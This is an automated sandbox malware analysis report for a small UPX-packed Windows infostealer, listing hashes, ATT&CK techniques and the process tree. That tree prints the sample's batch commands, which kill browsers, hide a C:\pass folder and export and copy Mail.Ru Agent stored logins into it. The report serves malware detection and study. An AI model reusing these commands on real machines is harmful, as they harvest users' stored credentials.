fb2de2c069f646306d5acf58dc2c9fd917f320d6f59391525e3e59d1a2ea211b

Analysis

max time kernel
293s
max time network
310s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
23-11-2022 20:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fb2de2c069f646306d5acf58dc2c9fd917f320d6f59391525e3e59d1a2ea211b.exe
Size

21KB
MD5

5cfb6d515cd6e5478be6d7f99ef8d230
SHA1

b7ec4125a88b26ffdca906141ab99f4d61a79ee3
SHA256

fb2de2c069f646306d5acf58dc2c9fd917f320d6f59391525e3e59d1a2ea211b
SHA512

796823ff1ceb64ea706348f5e19120f638451d0c11836de2fa9b2734a6d386d146d8a84e7e8f15bdd0257424c6fa2f24ff46b6c2dba0d8e769aa82e41281e5c3
SSDEEP

384:kIiV728hUQ7Y2P/cVEccDdye7kjlWLe7grPiA8jyrMPhTjanbBoZ/BMG8IVmLD4:kRGuY2P0Vo6r7SiAwyrMRjbpBMjnRnbl

Score

8^/10

evasion spyware stealer upx

Malware Config

Signatures

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
3456	attrib.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3120-132-0x0000000000400000-0x0000000000410000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation	fb2de2c069f646306d5acf58dc2c9fd917f320d6f59391525e3e59d1a2ea211b.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
4328	taskkill.exe
4900	taskkill.exe
3044	taskkill.exe
3092	taskkill.exe
3900	taskkill.exe

Runs .reg file with regedit 2 IoCs

pid	Process
4600	regedit.exe
4720	regedit.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4328	taskkill.exe
Token: SeDebugPrivilege	4900	taskkill.exe
Token: SeDebugPrivilege	3044	taskkill.exe
Token: SeDebugPrivilege	3092	taskkill.exe
Token: SeDebugPrivilege	3900	taskkill.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 3120 wrote to memory of 1324	3120	fb2de2c069f646306d5acf58dc2c9fd917f320d6f59391525e3e59d1a2ea211b.exe	81
PID 3120 wrote to memory of 1324	3120	fb2de2c069f646306d5acf58dc2c9fd917f320d6f59391525e3e59d1a2ea211b.exe	81
PID 3120 wrote to memory of 1324	3120	fb2de2c069f646306d5acf58dc2c9fd917f320d6f59391525e3e59d1a2ea211b.exe	81
PID 1324 wrote to memory of 4328	1324	cmd.exe	84
PID 1324 wrote to memory of 4328	1324	cmd.exe	84
PID 1324 wrote to memory of 4328	1324	cmd.exe	84
PID 1324 wrote to memory of 4900	1324	cmd.exe	86
PID 1324 wrote to memory of 4900	1324	cmd.exe	86
PID 1324 wrote to memory of 4900	1324	cmd.exe	86
PID 1324 wrote to memory of 3044	1324	cmd.exe	87
PID 1324 wrote to memory of 3044	1324	cmd.exe	87
PID 1324 wrote to memory of 3044	1324	cmd.exe	87
PID 1324 wrote to memory of 3092	1324	cmd.exe	88
PID 1324 wrote to memory of 3092	1324	cmd.exe	88
PID 1324 wrote to memory of 3092	1324	cmd.exe	88
PID 1324 wrote to memory of 3900	1324	cmd.exe	89
PID 1324 wrote to memory of 3900	1324	cmd.exe	89
PID 1324 wrote to memory of 3900	1324	cmd.exe	89
PID 1324 wrote to memory of 3456	1324	cmd.exe	90
PID 1324 wrote to memory of 3456	1324	cmd.exe	90
PID 1324 wrote to memory of 3456	1324	cmd.exe	90
PID 1324 wrote to memory of 4600	1324	cmd.exe	91
PID 1324 wrote to memory of 4600	1324	cmd.exe	91
PID 1324 wrote to memory of 4600	1324	cmd.exe	91
PID 1324 wrote to memory of 4720	1324	cmd.exe	93
PID 1324 wrote to memory of 4720	1324	cmd.exe	93
PID 1324 wrote to memory of 4720	1324	cmd.exe	93
PID 1324 wrote to memory of 4284	1324	cmd.exe	94
PID 1324 wrote to memory of 4284	1324	cmd.exe	94
PID 1324 wrote to memory of 4284	1324	cmd.exe	94
PID 1324 wrote to memory of 4936	1324	cmd.exe	96
PID 1324 wrote to memory of 4936	1324	cmd.exe	96
PID 1324 wrote to memory of 4936	1324	cmd.exe	96

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3456	attrib.exe

C:\Users\Admin\AppData\Local\Temp\fb2de2c069f646306d5acf58dc2c9fd917f320d6f59391525e3e59d1a2ea211b.exe
"C:\Users\Admin\AppData\Local\Temp\fb2de2c069f646306d5acf58dc2c9fd917f320d6f59391525e3e59d1a2ea211b.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3120
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FC1E.tmp\dan.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1324
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im opera.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4328
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im firefox.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4900
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im iexplore.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3092
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im magent.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3900
- - C:\Windows\SysWOW64\attrib.exe
    attrib C:\pass +h +s +a +r
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:3456
- - C:\Windows\SysWOW64\regedit.exe
    regedit.exe -ea C:\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2
    3⤵
    - Runs .reg file with regedit
    PID:4600
- - C:\Windows\SysWOW64\regedit.exe
    regedit.exe -ea C:\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3
    3⤵
    - Runs .reg file with regedit
    PID:4720
- - C:\Windows\SysWOW64\xcopy.exe
    Xcopy Mra\Base C:\pass\MailAgent /K /H /G /Q /R /S /Y /E
    3⤵
    - Enumerates system info in registry
    PID:4284
- - C:\Windows\SysWOW64\xcopy.exe
    Xcopy Mra\Update\ver.txt C:\pass\MailAgent /K /H /G /Q /R /S /Y
    3⤵
    - Enumerates system info in registry
    PID:4936

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\FC1E.tmp\dan.bat

Filesize
1KB

MD5
78a19ee5542b671682e84dd24bfcf12c

SHA1
fcc42a36f23a08e5c472cea5980f19f52e2f9e36

SHA256
4c98d2430494d4789f476b613926694a051d88da76f508d3f66f4791d8ba2f03

SHA512
ba9666e9129dad638e92ad444f6b184363d2454616a6ff3f37db161150700d630214b64c3801ede3b850527ea2e3a10e9ef11ca0f831a248bf48cafd832d7eb6

Download Submit
memory/3120-132-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads